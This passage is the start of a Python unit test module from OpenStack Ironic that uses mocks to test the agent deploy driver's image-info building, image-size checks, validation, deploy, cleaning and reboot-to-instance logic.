| gpl-3.0 | 1,755,466,251,019,039,200 | 26 | 71 | 0.508379 | false |
devananda/ironic | ironic/tests/unit/drivers/modules/test_agent.py | 1 | 58308 | # Copyright 2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import types
import mock
from oslo_config import cfg
from ironic.common import dhcp_factory
from ironic.common import exception
from ironic.common import image_service
from ironic.common import images
from ironic.common import raid
from ironic.common import states
from ironic.conductor import task_manager
from ironic.conductor import utils as manager_utils
from ironic.drivers.modules import agent
from ironic.drivers.modules import agent_base_vendor
from ironic.drivers.modules import agent_client
from ironic.drivers.modules import deploy_utils
from ironic.drivers.modules import fake
from ironic.drivers.modules import pxe
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.objects import utils as object_utils
INSTANCE_INFO = db_utils.get_test_agent_instance_info()
DRIVER_INFO = db_utils.get_test_agent_driver_info()
DRIVER_INTERNAL_INFO = db_utils.get_test_agent_driver_internal_info()
CONF = cfg.CONF
class TestAgentMethods(db_base.DbTestCase):
def setUp(self):
super(TestAgentMethods, self).setUp()
self.node = object_utils.create_test_node(self.context,
driver='fake_agent')
dhcp_factory.DHCPFactory._dhcp_provider = None
@mock.patch.object(image_service, 'GlanceImageService', autospec=True)
def test_build_instance_info_for_deploy_glance_image(self, glance_mock):
i_info = self.node.instance_info
i_info['image_source'] = '733d1c44-a2ea-414b-aca7-69decf20d810'
driver_internal_info = self.node.driver_internal_info
driver_internal_info['is_whole_disk_image'] = True
self.node.driver_internal_info = driver_internal_info
self.node.instance_info = i_info
self.node.save()
image_info = {'checksum': 'aa', 'disk_format': 'qcow2',
'container_format': 'bare'}
glance_mock.return_value.show = mock.MagicMock(spec_set=[],
return_value=image_info)
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
agent.build_instance_info_for_deploy(task)
glance_mock.assert_called_once_with(version=2,
context=task.context)
glance_mock.return_value.show.assert_called_once_with(
self.node.instance_info['image_source'])
glance_mock.return_value.swift_temp_url.assert_called_once_with(
image_info)
@mock.patch.object(deploy_utils, 'parse_instance_info', autospec=True)
@mock.patch.object(image_service, 'GlanceImageService', autospec=True)
def test_build_instance_info_for_deploy_glance_partition_image(
self, glance_mock, parse_instance_info_mock):
i_info = self.node.instance_info
i_info['image_source'] = '733d1c44-a2ea-414b-aca7-69decf20d810'
i_info['kernel'] = '13ce5a56-1de3-4916-b8b2-be778645d003'
i_info['ramdisk'] = 'a5a370a8-1b39-433f-be63-2c7d708e4b4e'
i_info['root_gb'] = 5
i_info['swap_mb'] = 4
i_info['ephemeral_gb'] = 0
i_info['ephemeral_format'] = None
i_info['configdrive'] = 'configdrive'
driver_internal_info = self.node.driver_internal_info
driver_internal_info['is_whole_disk_image'] = False
self.node.driver_internal_info = driver_internal_info
self.node.instance_info = i_info
self.node.save()
image_info = {'checksum': 'aa', 'disk_format': 'qcow2',
'container_format': 'bare',
'properties': {'kernel_id': 'kernel',
'ramdisk_id': 'ramdisk'}}
glance_mock.return_value.show = mock.MagicMock(spec_set=[],
return_value=image_info)
glance_obj_mock = glance_mock.return_value
glance_obj_mock.swift_temp_url.return_value = 'temp-url'
parse_instance_info_mock.return_value = {'swap_mb': 4}
image_source = '733d1c44-a2ea-414b-aca7-69decf20d810'
expected_i_info = {'root_gb': 5,
'swap_mb': 4,
'ephemeral_gb': 0,
'ephemeral_format': None,
'configdrive': 'configdrive',
'image_source': image_source,
'image_url': 'temp-url',
'kernel': 'kernel',
'ramdisk': 'ramdisk',
'image_type': 'partition',
'image_checksum': 'aa',
'fake_password': 'fakepass',
'image_container_format': 'bare',
'image_disk_format': 'qcow2',
'foo': 'bar'}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
info = agent.build_instance_info_for_deploy(task)
glance_mock.assert_called_once_with(version=2,
context=task.context)
glance_mock.return_value.show.assert_called_once_with(
self.node.instance_info['image_source'])
glance_mock.return_value.swift_temp_url.assert_called_once_with(
image_info)
image_type = task.node.instance_info.get('image_type')
self.assertEqual('partition', image_type)
self.assertEqual('kernel', info.get('kernel'))
self.assertEqual('ramdisk', info.get('ramdisk'))
self.assertEqual(expected_i_info, info)
parse_instance_info_mock.assert_called_once_with(task.node)
@mock.patch.object(image_service.HttpImageService, 'validate_href',
autospec=True)
def test_build_instance_info_for_deploy_nonglance_image(
self, validate_href_mock):
i_info = self.node.instance_info
driver_internal_info = self.node.driver_internal_info
i_info['image_source'] = 'http://image-ref'
i_info['image_checksum'] = 'aa'
i_info['root_gb'] = 10
i_info['image_checksum'] = 'aa'
driver_internal_info['is_whole_disk_image'] = True
self.node.instance_info = i_info
self.node.driver_internal_info = driver_internal_info
self.node.save()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
info = agent.build_instance_info_for_deploy(task)
self.assertEqual(self.node.instance_info['image_source'],
info['image_url'])
validate_href_mock.assert_called_once_with(
mock.ANY, 'http://image-ref')
@mock.patch.object(deploy_utils, 'parse_instance_info', autospec=True)
@mock.patch.object(image_service.HttpImageService, 'validate_href',
autospec=True)
def test_build_instance_info_for_deploy_nonglance_partition_image(
self, validate_href_mock, parse_instance_info_mock):
i_info = self.node.instance_info
driver_internal_info = self.node.driver_internal_info
i_info['image_source'] = 'http://image-ref'
i_info['kernel'] = 'http://kernel-ref'
i_info['ramdisk'] = 'http://ramdisk-ref'
i_info['image_checksum'] = 'aa'
i_info['root_gb'] = 10
driver_internal_info['is_whole_disk_image'] = False
self.node.instance_info = i_info
self.node.driver_internal_info = driver_internal_info
self.node.save()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
validate_href_mock.side_effect = ['http://image-ref',
'http://kernel-ref',
'http://ramdisk-ref']
parse_instance_info_mock.return_value = {'swap_mb': 5}
expected_i_info = {'image_source': 'http://image-ref',
'image_url': 'http://image-ref',
'image_type': 'partition',
'kernel': 'http://kernel-ref',
'ramdisk': 'http://ramdisk-ref',
'image_checksum': 'aa',
'root_gb': 10,
'swap_mb': 5,
'fake_password': 'fakepass',
'foo': 'bar'}
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
info = agent.build_instance_info_for_deploy(task)
self.assertEqual(self.node.instance_info['image_source'],
info['image_url'])
validate_href_mock.assert_called_once_with(
mock.ANY, 'http://image-ref')
self.assertEqual('partition', info.get('image_type'))
self.assertEqual(expected_i_info, info)
parse_instance_info_mock.assert_called_once_with(task.node)
@mock.patch.object(image_service.HttpImageService, 'validate_href',
autospec=True)
def test_build_instance_info_for_deploy_nonsupported_image(
self, validate_href_mock):
validate_href_mock.side_effect = iter(
[exception.ImageRefValidationFailed(
image_href='file://img.qcow2', reason='fail')])
i_info = self.node.instance_info
i_info['image_source'] = 'file://img.qcow2'
i_info['image_checksum'] = 'aa'
self.node.instance_info = i_info
self.node.save()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
self.assertRaises(exception.ImageRefValidationFailed,
agent.build_instance_info_for_deploy, task)
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size(self, show_mock):
show_mock.return_value = {
'size': 10 * 1024 * 1024,
'disk_format': 'qcow2',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
agent.check_image_size(task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_without_memory_mb(self, show_mock):
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties.pop('memory_mb', None)
agent.check_image_size(task, 'fake-image')
self.assertFalse(show_mock.called)
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_fail(self, show_mock):
show_mock.return_value = {
'size': 11 * 1024 * 1024,
'disk_format': 'qcow2',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
self.assertRaises(exception.InvalidParameterValue,
agent.check_image_size,
task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_fail_by_agent_consumed_memory(self, show_mock):
self.config(memory_consumed_by_agent=2, group='agent')
show_mock.return_value = {
'size': 9 * 1024 * 1024,
'disk_format': 'qcow2',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
self.assertRaises(exception.InvalidParameterValue,
agent.check_image_size,
task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_raw_stream_enabled(self, show_mock):
CONF.set_override('stream_raw_images', True, 'agent')
# Image is bigger than memory but it's raw and will be streamed
# so the test should pass
show_mock.return_value = {
'size': 15 * 1024 * 1024,
'disk_format': 'raw',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
agent.check_image_size(task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_raw_stream_disabled(self, show_mock):
CONF.set_override('stream_raw_images', False, 'agent')
show_mock.return_value = {
'size': 15 * 1024 * 1024,
'disk_format': 'raw',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
# Image is raw but stream is disabled, so test should fail since
# the image is bigger than the RAM size
self.assertRaises(exception.InvalidParameterValue,
agent.check_image_size,
task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
class TestAgentDeploy(db_base.DbTestCase):
def setUp(self):
super(TestAgentDeploy, self).setUp()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
self.driver = agent.AgentDeploy()
n = {
'driver': 'fake_agent',
'instance_info': INSTANCE_INFO,
'driver_info': DRIVER_INFO,
'driver_internal_info': DRIVER_INTERNAL_INFO,
}
self.node = object_utils.create_test_node(self.context, **n)
self.ports = [
object_utils.create_test_port(self.context, node_id=self.node.id)]
dhcp_factory.DHCPFactory._dhcp_provider = None
def test_get_properties(self):
expected = agent.COMMON_PROPERTIES
self.assertEqual(expected, self.driver.get_properties())
@mock.patch.object(deploy_utils, 'validate_capabilities',
spec_set=True, autospec=True)
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate(self, pxe_boot_validate_mock, show_mock,
validate_capability_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.driver.validate(task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
show_mock.assert_called_once_with(self.context, 'fake-image')
validate_capability_mock.assert_called_once_with(task.node)
@mock.patch.object(deploy_utils, 'validate_capabilities',
spec_set=True, autospec=True)
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_driver_info_manage_agent_boot_false(
self, pxe_boot_validate_mock, show_mock,
validate_capability_mock):
self.config(manage_agent_boot=False, group='agent')
self.node.driver_info = {}
self.node.save()
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.driver.validate(task)
self.assertFalse(pxe_boot_validate_mock.called)
show_mock.assert_called_once_with(self.context, 'fake-image')
validate_capability_mock.assert_called_once_with(task.node)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_instance_info_missing_params(
self, pxe_boot_validate_mock):
self.node.instance_info = {}
self.node.save()
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
e = self.assertRaises(exception.MissingParameterValue,
self.driver.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
self.assertIn('instance_info.image_source', str(e))
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_nonglance_image_no_checksum(
self, pxe_boot_validate_mock):
i_info = self.node.instance_info
i_info['image_source'] = 'http://image-ref'
del i_info['image_checksum']
self.node.instance_info = i_info
self.node.save()
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
self.assertRaises(exception.MissingParameterValue,
self.driver.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_invalid_root_device_hints(
self, pxe_boot_validate_mock, show_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.properties['root_device'] = {'size': 'not-int'}
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'validate', autospec=True)
def test_validate_invalid_proxies(self, pxe_boot_validate_mock, show_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.driver_info.update({
'image_https_proxy': 'git://spam.ni',
'image_http_proxy': 'http://spam.ni',
'image_no_proxy': '1' * 500})
self.assertRaisesRegexp(exception.InvalidParameterValue,
'image_https_proxy.*image_no_proxy',
task.driver.deploy.validate, task)
pxe_boot_validate_mock.assert_called_once_with(
task.driver.boot, task)
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch('ironic.conductor.utils.node_power_action', autospec=True)
def test_deploy(self, power_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
driver_return = self.driver.deploy(task)
self.assertEqual(driver_return, states.DEPLOYWAIT)
power_mock.assert_called_once_with(task, states.REBOOT)
@mock.patch('ironic.conductor.utils.node_power_action', autospec=True)
def test_tear_down(self, power_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
driver_return = self.driver.tear_down(task)
power_mock.assert_called_once_with(task, states.POWER_OFF)
self.assertEqual(driver_return, states.DELETED)
@mock.patch.object(pxe.PXEBoot, 'prepare_ramdisk')
@mock.patch.object(deploy_utils, 'build_agent_options')
@mock.patch.object(agent, 'build_instance_info_for_deploy')
def test_prepare(self, build_instance_info_mock, build_options_mock,
pxe_prepare_ramdisk_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
task.node.provision_state = states.DEPLOYING
build_instance_info_mock.return_value = {'foo': 'bar'}
build_options_mock.return_value = {'a': 'b'}
self.driver.prepare(task)
build_instance_info_mock.assert_called_once_with(task)
build_options_mock.assert_called_once_with(task.node)
pxe_prepare_ramdisk_mock.assert_called_once_with(
task, {'a': 'b'})
self.node.refresh()
self.assertEqual('bar', self.node.instance_info['foo'])
@mock.patch.object(pxe.PXEBoot, 'prepare_ramdisk')
@mock.patch.object(deploy_utils, 'build_agent_options')
@mock.patch.object(agent, 'build_instance_info_for_deploy')
def test_prepare_manage_agent_boot_false(
self, build_instance_info_mock, build_options_mock,
pxe_prepare_ramdisk_mock):
self.config(group='agent', manage_agent_boot=False)
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
task.node.provision_state = states.DEPLOYING
build_instance_info_mock.return_value = {'foo': 'bar'}
self.driver.prepare(task)
build_instance_info_mock.assert_called_once_with(task)
self.assertFalse(build_options_mock.called)
self.assertFalse(pxe_prepare_ramdisk_mock.called)
self.node.refresh()
self.assertEqual('bar', self.node.instance_info['foo'])
@mock.patch.object(pxe.PXEBoot, 'prepare_ramdisk')
@mock.patch.object(deploy_utils, 'build_agent_options')
@mock.patch.object(agent, 'build_instance_info_for_deploy')
def test_prepare_active(
self, build_instance_info_mock, build_options_mock,
pxe_prepare_ramdisk_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
task.node.provision_state = states.ACTIVE
self.driver.prepare(task)
self.assertFalse(build_instance_info_mock.called)
self.assertFalse(build_options_mock.called)
self.assertFalse(pxe_prepare_ramdisk_mock.called)
@mock.patch('ironic.common.dhcp_factory.DHCPFactory._set_dhcp_provider')
@mock.patch('ironic.common.dhcp_factory.DHCPFactory.clean_dhcp')
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk')
def test_clean_up(self, pxe_clean_up_ramdisk_mock, clean_dhcp_mock,
set_dhcp_provider_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.driver.clean_up(task)
pxe_clean_up_ramdisk_mock.assert_called_once_with(task)
set_dhcp_provider_mock.assert_called_once_with()
clean_dhcp_mock.assert_called_once_with(task)
@mock.patch('ironic.common.dhcp_factory.DHCPFactory._set_dhcp_provider')
@mock.patch('ironic.common.dhcp_factory.DHCPFactory.clean_dhcp')
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk')
def test_clean_up_manage_agent_boot_false(self, pxe_clean_up_ramdisk_mock,
clean_dhcp_mock,
set_dhcp_provider_mock):
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.config(group='agent', manage_agent_boot=False)
self.driver.clean_up(task)
self.assertFalse(pxe_clean_up_ramdisk_mock.called)
set_dhcp_provider_mock.assert_called_once_with()
clean_dhcp_mock.assert_called_once_with(task)
@mock.patch('ironic.drivers.modules.deploy_utils.agent_get_clean_steps',
autospec=True)
def test_get_clean_steps(self, mock_get_clean_steps):
# Test getting clean steps
mock_steps = [{'priority': 10, 'interface': 'deploy',
'step': 'erase_devices'}]
mock_get_clean_steps.return_value = mock_steps
with task_manager.acquire(self.context, self.node.uuid) as task:
steps = self.driver.get_clean_steps(task)
mock_get_clean_steps.assert_called_once_with(
task, interface='deploy',
override_priorities={'erase_devices': None})
self.assertEqual(mock_steps, steps)
@mock.patch('ironic.drivers.modules.deploy_utils.agent_get_clean_steps',
autospec=True)
def test_get_clean_steps_config_priority(self, mock_get_clean_steps):
# Test that we can override the priority of get clean steps
# Use 0 because it is an edge case (false-y) and used in devstack
self.config(erase_devices_priority=0, group='deploy')
mock_steps = [{'priority': 10, 'interface': 'deploy',
'step': 'erase_devices'}]
mock_get_clean_steps.return_value = mock_steps
with task_manager.acquire(self.context, self.node.uuid) as task:
self.driver.get_clean_steps(task)
mock_get_clean_steps.assert_called_once_with(
task, interface='deploy',
override_priorities={'erase_devices': 0})
@mock.patch.object(deploy_utils, 'prepare_inband_cleaning', autospec=True)
def test_prepare_cleaning(self, prepare_inband_cleaning_mock):
prepare_inband_cleaning_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertEqual(
states.CLEANWAIT, self.driver.prepare_cleaning(task))
prepare_inband_cleaning_mock.assert_called_once_with(
task, manage_boot=True)
@mock.patch.object(deploy_utils, 'prepare_inband_cleaning', autospec=True)
def test_prepare_cleaning_manage_agent_boot_false(
self, prepare_inband_cleaning_mock):
prepare_inband_cleaning_mock.return_value = states.CLEANWAIT
self.config(group='agent', manage_agent_boot=False)
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertEqual(
states.CLEANWAIT, self.driver.prepare_cleaning(task))
prepare_inband_cleaning_mock.assert_called_once_with(
task, manage_boot=False)
@mock.patch.object(deploy_utils, 'tear_down_inband_cleaning',
autospec=True)
def test_tear_down_cleaning(self, tear_down_cleaning_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
self.driver.tear_down_cleaning(task)
tear_down_cleaning_mock.assert_called_once_with(
task, manage_boot=True)
@mock.patch.object(deploy_utils, 'tear_down_inband_cleaning',
autospec=True)
def test_tear_down_cleaning_manage_agent_boot_false(
self, tear_down_cleaning_mock):
self.config(group='agent', manage_agent_boot=False)
with task_manager.acquire(self.context, self.node.uuid) as task:
self.driver.tear_down_cleaning(task)
tear_down_cleaning_mock.assert_called_once_with(
task, manage_boot=False)
class TestAgentVendor(db_base.DbTestCase):
def setUp(self):
super(TestAgentVendor, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_agent")
self.passthru = agent.AgentVendorInterface()
n = {
'driver': 'fake_agent',
'instance_info': INSTANCE_INFO,
'driver_info': DRIVER_INFO,
'driver_internal_info': DRIVER_INTERNAL_INFO,
}
self.node = object_utils.create_test_node(self.context, **n)
def _test_continue_deploy(self, additional_driver_info=None,
additional_expected_image_info=None):
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
driver_info = self.node.driver_info
driver_info.update(additional_driver_info or {})
self.node.driver_info = driver_info
self.node.save()
test_temp_url = 'http://image'
expected_image_info = {
'urls': [test_temp_url],
'id': 'fake-image',
'checksum': 'checksum',
'disk_format': 'qcow2',
'container_format': 'bare',
'stream_raw_images': CONF.agent.stream_raw_images,
}
expected_image_info.update(additional_expected_image_info or {})
client_mock = mock.MagicMock(spec_set=['prepare_image'])
self.passthru._client = client_mock
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
self.passthru.continue_deploy(task)
client_mock.prepare_image.assert_called_with(task.node,
expected_image_info)
self.assertEqual(states.DEPLOYWAIT, task.node.provision_state)
self.assertEqual(states.ACTIVE,
task.node.target_provision_state)
def test_continue_deploy(self):
self._test_continue_deploy()
def test_continue_deploy_with_proxies(self):
self._test_continue_deploy(
additional_driver_info={'image_https_proxy': 'https://spam.ni',
'image_http_proxy': 'spam.ni',
'image_no_proxy': '.eggs.com'},
additional_expected_image_info={
'proxies': {'https': 'https://spam.ni',
'http': 'spam.ni'},
'no_proxy': '.eggs.com'}
)
def test_continue_deploy_with_no_proxy_without_proxies(self):
self._test_continue_deploy(
additional_driver_info={'image_no_proxy': '.eggs.com'}
)
def test_continue_deploy_image_source_is_url(self):
instance_info = self.node.instance_info
instance_info['image_source'] = 'http://example.com/woof.img'
self.node.instance_info = instance_info
self._test_continue_deploy(
additional_expected_image_info={
'id': 'woof.img'
}
)
def test_continue_deploy_partition_image(self):
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
i_info = self.node.instance_info
i_info['kernel'] = 'kernel'
i_info['ramdisk'] = 'ramdisk'
i_info['root_gb'] = 10
i_info['swap_mb'] = 10
i_info['ephemeral_mb'] = 0
i_info['ephemeral_format'] = 'abc'
i_info['configdrive'] = 'configdrive'
i_info['preserve_ephemeral'] = False
i_info['image_type'] = 'partition'
i_info['root_mb'] = 10240
i_info['deploy_boot_mode'] = 'bios'
i_info['capabilities'] = {"boot_option": "local",
"disk_label": "msdos"}
self.node.instance_info = i_info
driver_internal_info = self.node.driver_internal_info
driver_internal_info['is_whole_disk_image'] = False
self.node.driver_internal_info = driver_internal_info
self.node.save()
test_temp_url = 'http://image'
expected_image_info = {
'urls': [test_temp_url],
'id': 'fake-image',
'node_uuid': self.node.uuid,
'checksum': 'checksum',
'disk_format': 'qcow2',
'container_format': 'bare',
'stream_raw_images': True,
'kernel': 'kernel',
'ramdisk': 'ramdisk',
'root_gb': 10,
'swap_mb': 10,
'ephemeral_mb': 0,
'ephemeral_format': 'abc',
'configdrive': 'configdrive',
'preserve_ephemeral': False,
'image_type': 'partition',
'root_mb': 10240,
'boot_option': 'local',
'deploy_boot_mode': 'bios',
'disk_label': 'msdos'
}
client_mock = mock.MagicMock(spec_set=['prepare_image'])
self.passthru._client = client_mock
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
self.passthru.continue_deploy(task)
client_mock.prepare_image.assert_called_with(task.node,
expected_image_info)
self.assertEqual(states.DEPLOYWAIT, task.node.provision_state)
self.assertEqual(states.ACTIVE,
task.node.target_provision_state)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance(self, clean_pxe_mock, check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock, node_power_action_mock,
uuid_mock):
check_deploy_mock.return_value = None
uuid_mock.return_value = 'root_uuid'
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = True
self.passthru.reboot_to_instance(task)
clean_pxe_mock.assert_called_once_with(task.driver.boot, task)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
power_off_mock.assert_called_once_with(task.node)
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
self.assertFalse(prepare_mock.called)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
driver_int_info = task.node.driver_internal_info
self.assertIsNone(driver_int_info.get('root_uuid_or_disk_id'))
self.assertFalse(uuid_mock.called)
@mock.patch.object(deploy_utils, 'get_boot_mode_for_deploy', autospec=True)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_partition_image(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock, boot_mode_mock):
check_deploy_mock.return_value = None
uuid_mock.return_value = 'root_uuid'
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
boot_mode_mock.return_value = 'bios'
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = False
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
power_off_mock.assert_called_once_with(task.node)
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
prepare_mock.assert_called_once_with(task.driver.boot, task)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
driver_int_info = task.node.driver_internal_info
self.assertEqual(driver_int_info.get('root_uuid_or_disk_id'),
'root_uuid')
uuid_mock.assert_called_once_with(self.passthru, task, 'root_uuid')
boot_mode_mock.assert_called_once_with(task.node)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_boot_none(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock):
check_deploy_mock.return_value = None
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = True
task.driver.boot = None
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
self.assertFalse(prepare_mock.called)
power_off_mock.assert_called_once_with(task.node)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
driver_int_info = task.node.driver_internal_info
self.assertIsNone(driver_int_info.get('root_uuid_or_disk_id'))
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
self.assertFalse(uuid_mock.called)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
